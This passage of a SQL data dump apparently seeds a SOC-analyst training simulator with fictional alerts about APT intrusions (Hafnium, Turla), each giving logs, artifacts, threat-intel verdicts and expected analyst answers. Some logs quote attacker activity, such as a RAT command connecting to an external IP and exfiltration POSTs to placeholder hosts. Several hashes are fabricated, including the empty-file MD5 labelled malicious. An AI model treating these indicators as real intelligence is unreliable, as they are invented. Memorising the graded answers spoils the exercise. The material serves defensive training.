backdoor.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"/Users/jdoe/Library/LaunchAgents/com.example.backdoor.plist\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"malicious\",\"details\":\"File used to maintain persistence for a backdoor.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (337, 'Command and Control (C2) Communication Detected', 'high', 'Network Traffic Analysis', 'This alert highlights the establishment of communication between the backdoor and the attacker\'s C2 servers, enabling further actions.', 'Lateral Movement', 'T1071.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:45Z\",\"src_ip\":\"192.168.1.45\",\"dst_ip\":\"185.92.220.133\",\"protocol\":\"HTTP\",\"method\":\"POST\",\"url\":\"http://malicious-domain.com/command\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"payload\":\"Encrypted data\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"username\":\"jdoe\"}', '2026-01-02 20:31:37', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.92.220.133\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known C2 server IP used for malicious activities.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-domain.com/command\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Domain associated with C2 communication.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash known for malware payload.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Username of the potentially compromised account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'NULL', 1, 0, NULL), (338, 'Data Exfiltration Attempt', 'high', 'Data Loss Prevention (DLP) Systems', 'An unauthorized transfer of sensitive data was detected. The attacker attempted to exfiltrate proprietary data from the internal network to an external IP address.', 'Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:35Z\",\"event_id\":\"EXFIL-2023-10-15-142235\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"file_name\":\"financial_report_Q3.pdf\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user\":\"jdoe\",\"action\":\"blocked\",\"alert_trigger\":\"Data Exfiltration Policy\",\"bytes_transferred\":1048576,\"description\":\"Attempted transfer of classified financial document via HTTPS to untrusted external IP.\"}', '2026-01-02 20:31:37', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal corporate network IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known IP address associated with exfiltration activities\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Integrity Monitoring\",\"verdict\":\"suspicious\",\"details\":\"Unrecognized file hash for sensitive document\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"HR System\",\"verdict\":\"internal\",\"details\":\"Employee account\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"financial_report_Q3.pdf\",\"is_critical\":true,\"osint_result\":{\"source\":\"Document Management System\",\"verdict\":\"sensitive\",\"details\":\"Confidential financial document\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (339, 'Initial Access via ProxyLogon Zero-Day', 'critical', 'Exchange server logs', 'Hafnium exploits the ProxyLogon zero-day vulnerabilities to breach the organization\'s perimeter defenses, marking the beginning of their operation.', 'Exploit', 'T1190 - Exploit Public-Facing Application', 1, 'new', NULL, '{\"timestamp\":\"2023-10-17T04:12:34Z\",\"src_ip\":\"203.0.113.45\",\"dest_ip\":\"192.168.1.10\",\"username\":\"SYSTEM\",\"exploit\":\"ProxyLogon\",\"url\":\"/owa/auth/x.js\",\"user_agent\":\"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"file_name\":\"shell.aspx\"}', '2026-01-03 00:04:00', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel_service\",\"verdict\":\"malicious\",\"details\":\"Known Hafnium IP associated with ProxyLogon exploits.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal Exchange server IP.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_db\",\"verdict\":\"malicious\",\"details\":\"Hash associated with web shell used in ProxyLogon exploit.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"shell.aspx\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_analysis_tool\",\"verdict\":\"malicious\",\"details\":\"Web shell file used for remote access.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NULL', 1, 0, NULL), (340, 'Web Shell Deployment - China Chopper', 'high', 'Web server logs', 'Following initial access, Hafnium deploys the China Chopper web shell to maintain persistent access and command capabilities on the compromised server. The web shell allows remote control and execution of commands on the server.', 'Malware Installation', 'T1505.003 - Web Shell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T13:45:23Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.100\",\"http_method\":\"POST\",\"requested_url\":\"/uploads/chopper.jsp\",\"response_code\":200,\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36\",\"filename\":\"chopper.jsp\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"username\":\"webadmin\"}', '2026-01-03 00:04:00', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Associated with known APT activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal web server\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Known hash for China Chopper web shell\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"chopper.jsp\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"malicious\",\"details\":\"Web shell filename used by attackers\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"webadmin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"Username for web server administration\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (341, 'Credential Harvesting via Mimikatz', 'critical', 'Endpoint detection logs', 'With web shell access established, Hafnium utilizes Mimikatz to extract credentials, enabling further infiltration within the network. Endpoint detection identified the execution of the Mimikatz tool to dump credentials from LSASS.', 'Credential Access', 'T1003: Credential Dumping', 1, 'new', NULL, '{\"timestamp\":\"2023-10-11T14:23:45Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.25\",\"username\":\"jdoe\",\"process_name\":\"mimikatz.exe\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"detection_method\":\"behavioral\",\"alert_trigger\":\"Unauthorized credential dump detected\",\"host_ip\":\"192.168.1.25\",\"host_name\":\"workstation-01\"}', '2026-01-03 00:04:00', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known command and control server IP\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Corporate workstation\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"mimikatz.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Credential dumping tool\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Match with known Mimikatz hash\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Advanced', 'NULL', 1, 0, NULL), (342, 'Lateral Movement Through SMB', 'high', 'Network traffic analysis', 'Using harvested credentials, Hafnium moves laterally across the network by exploiting SMB protocol vulnerabilities, targeting additional critical systems.', 'Network Propagation', 'T1021.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-21T14:32:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.15.23\",\"protocol\":\"SMB\",\"action\":\"Access Granted\",\"username\":\"j.doe\",\"file_accessed\":\"\\\\\\\\192.168.15.23\\\\C$\\\\Windows\\\\system32\\\\cmd.exe\",\"hash\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"event_id\":4624,\"message\":\"An account was successfully logged on\",\"logon_type\":3}', '2026-01-03 00:04:00', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known Hafnium APT IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.15.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Inventory\",\"verdict\":\"internal\",\"details\":\"Corporate workstation\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Platform\",\"verdict\":\"malicious\",\"details\":\"Associated with Hafnium\'s lateral movement tools\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"internal\",\"details\":\"Valid corporate user\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (343, 'Execution of Reconnaissance Commands', 'high', 'Command-line audit logs', 'Hafnium executed a series of reconnaissance commands to map the network and locate key data repositories. This activity is indicative of an advanced attack with the objective of identifying sensitive data and valuable assets within the target organization.', 'Reconnaissance', 'T1016 - System Network Configuration Discovery', 1, 'new', NULL, '{\"timestamp\":\"2023-10-18T14:23:56Z\",\"event_id\":4624,\"command\":\"netstat -an; ipconfig /all; systeminfo\",\"user\":\"compromised_user\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.10\",\"filename\":\"network_recon_tool.exe\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-01-03 00:04:00', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with Hafnium APT group.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal network IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"network_recon_tool.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Security\",\"verdict\":\"suspicious\",\"details\":\"Unusual tool executed on the endpoint by a compromised user.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malicious software used by Hafnium.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (344, 'Data Collection for Exfiltration', 'high', 'File access logs', 'An advanced threat actor, identified as Hafnium, has aggregated sensitive information. The data is being prepared for exfiltration. This activity was detected through abnormal file access patterns linked to known malicious IP addresses.', 'Data Collection', 'T1005: Data from Local System', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T15:23:34Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.25\",\"username\":\"j.doe\",\"file_accessed\":\"/financial_reports/2023/Q3_financials.xlsx\",\"hash\":\"a1b2c3d4e5f67890123456789abcdef0\",\"action\":\"read\",\"status\":\"success\"}', '2026-01-03 00:04:00', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known Hafnium IP associated with data exfiltration activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host potentially compromised.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Unusual file access patterns detected.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"/financial_reports/2023/Q3_financials.xlsx\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Monitoring System\",\"verdict\":\"suspicious\",\"details\":\"Sensitive file accessed during off-hours by suspicious IP.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"a1b2c3d4e5f67890123456789abcdef0\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malware used by Hafnium.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (345, 'Data Exfiltration via HTTP POST', 'critical', 'Network traffic logs', 'Anomalous outbound traffic detected from an internal host to a known malicious IP, indicating possible data exfiltration via HTTP POST requests.', 'Data Exfiltration', 'T1041', 1, 'investigating', 34, '{\"timestamp\":\"2023-10-05T14:32:00Z\",\"source_ip\":\"192.168.1.25\",\"destination_ip\":\"203.0.113.45\",\"http_method\":\"POST\",\"url\":\"http://malicious-cc-server.com/upload\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36\",\"filename\":\"exfiltrated_data.zip\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"username\":\"john_doe\",\"response_code\":200}', '2026-01-03 00:04:00', '2026-01-11 01:45:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of possibly compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known command and control servers.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-cc-server.com/upload\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"URL linked to data exfiltration activities.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"clean\",\"details\":\"File hash not previously associated with known malware.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"john_doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"User account potentially used during exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NULL', 1, 0, NULL), (346, 'Cleanup and Removal of Indicators', 'high', 'System event logs', 'In an advanced attempt to evade detection, the threat actor Hafnium executed commands to remove event logs and other indicators of compromise from the system. This action is aimed at erasing traces of their presence and prolonging unauthorized access.', 'Defense Evasion', 'T1070.004', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:45Z\",\"event_id\":1102,\"log_name\":\"Security\",\"source\":\"Microsoft-Windows-Eventlog\",\"task_category\":\"Log Clear\",\"level\":\"Information\",\"user\":{\"id\":\"S-1-5-21-3623811015-3361044348-30300820-1013\",\"name\":\"hacker_user\"},\"computer\":\"compromised-host.local\",\"description\":\"The audit log was cleared.\",\"ip_address\":\"192.168.1.45\",\"malicious_ip\":\"203.0.113.5\",\"deleted_files\":[\"C:\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\Security.evtx\",\"C:\\\\Temp\\\\malware.exe\"],\"hash\":\"59a5d6a3b1c7f5e4a5b1c6a7f5e4d3c2\"}', '2026-01-03 00:04:00', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known Hafnium infrastructure.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"59a5d6a3b1c7f5e4a5b1c6a7f5e4d3c2\",\"is_critical\":true,\"osint_result\":{\"source\":\"virustotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with a known Hafnium malware sample.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (347, 'Initial Access via Spear Phishing', 'high', 'Email Gateway Logs', 'A spear phishing email was detected targeting a diplomatic network. The email contained a malicious attachment believed to be linked with the Turla APT group. The email was sent from a known malicious IP address and contained a weaponized document aimed at exploiting vulnerabilities to gain an initial foothold.', 'Phishing', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-11T14:32:00Z\",\"email_id\":\"345abc678def901234ghi567\",\"sender\":\"malicious.actor@example.com\",\"recipient\":\"john.doe@diplomat.org\",\"subject\":\"Urgent: Diplomatic Meeting Itinerary\",\"attachment\":\"Meeting_Agenda.docx\",\"attachment_hash\":\"e99a18c428cb38d5f260853678922e03\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.10\",\"malware_family\":\"CobraDoc\",\"detection\":{\"rule_id\":\"PHISH-001\",\"rule_name\":\"Spear Phishing with Malicious Attachment\",\"confidence\":\"High\"}}', '2026-01-03 00:37:55', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"malicious.actor@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Spamhaus\",\"verdict\":\"malicious\",\"details\":\"Known phishing email sender associated with APT campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AlienVault OTX\",\"verdict\":\"malicious\",\"details\":\"IP address associated with Turla APT infrastructure.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Turla weaponized document.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Meeting_Agenda.docx\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Threat Intelligence\",\"verdict\":\"suspicious\",\"details\":\"Filename commonly used in spear phishing campaigns.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (348, 'Execution of Remote Access Tool', 'high', 'Endpoint Detection and Response', 'With initial access secured, Turla deploys a remote access tool to execute commands and further their control over the infected endpoint. Anomalous execution detected on endpoint with associated malicious artifacts.', 'Malware Execution', 'T1219 - Remote Access Tools', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":\"E12345\",\"event_type\":\"malware_execution\",\"source_ip\":\"192.168.1.10\",\"destination_ip\":\"185.45.67.89\",\"username\":\"jdoe\",\"process_name\":\"rat_tool.exe\",\"process_hash\":\"3fa4c0f9d5d2f4e7a9b8c3e1c7a8f9b0\",\"command_line\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\rat_tool.exe -connect 185.45.67.89\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\rat_tool.exe\",\"indicator\":\"Turla RAT\",\"device_id\":\"DESKTOP-ABCD1234\"}', '2026-01-03 00:37:55', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.45.67.89\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"Known Turla command and control server\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3fa4c0f9d5d2f4e7a9b8c3e1c7a8f9b0\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Turla RAT\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"rat_tool.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"EDR\",\"verdict\":\"malicious\",\"details\":\"Executable associated with Turla RAT\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"clean\",\"details\":\"Valid internal user\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (349, 'Rootkit Deployment for Persistence', 'high', 'System Event Logs', 'To ensure continued access, Turla installs a sophisticated rootkit that embeds itself deeply within the system, evading detection and enabling persistent control.', 'Persistence Mechanism', 'T1014', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:00Z\",\"event_id\":\"7045\",\"event_source\":\"Service Control Manager\",\"computer_name\":\"compromised-host.local\",\"user\":\"SYSTEM\",\"service_name\":\"turla_rootkit\",\"service_file_name\":\"C:\\\\Windows\\\\System32\\\\drivers\\\\trkl.sys\",\"service_type\":\"Kernel Driver\",\"service_start_type\":\"Auto\",\"service_account\":\"LocalSystem\",\"network_activity\":{\"external_ip\":\"185.92.220.23\",\"internal_ip\":\"192.168.1.105\",\"protocol\":\"TCP\",\"port\":443},\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-01-03 00:37:55', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.92.220.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known Turla C2 server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Compromised host internal IP\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malicious rootkit\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (350, 'Lateral Movement via Hijacked Credentials', 'high', 'Network Traffic Analysis', 'Anomalous lateral movement detected involving the use of hijacked credentials to access multiple internal systems. The activity is linked to the Turla group, known for its lateral techniques to extend network control.', 'Credential Access', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:07Z\",\"source_ip\":\"198.51.100.23\",\"target_ip\":\"192.168.1.15\",\"protocol\":\"RDP\",\"username\":\"jdoe\",\"action\":\"Successful login\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"file_name\":\"turla_tool.exe\",\"event_id\":\"4624\",\"description\":\"Successful logon 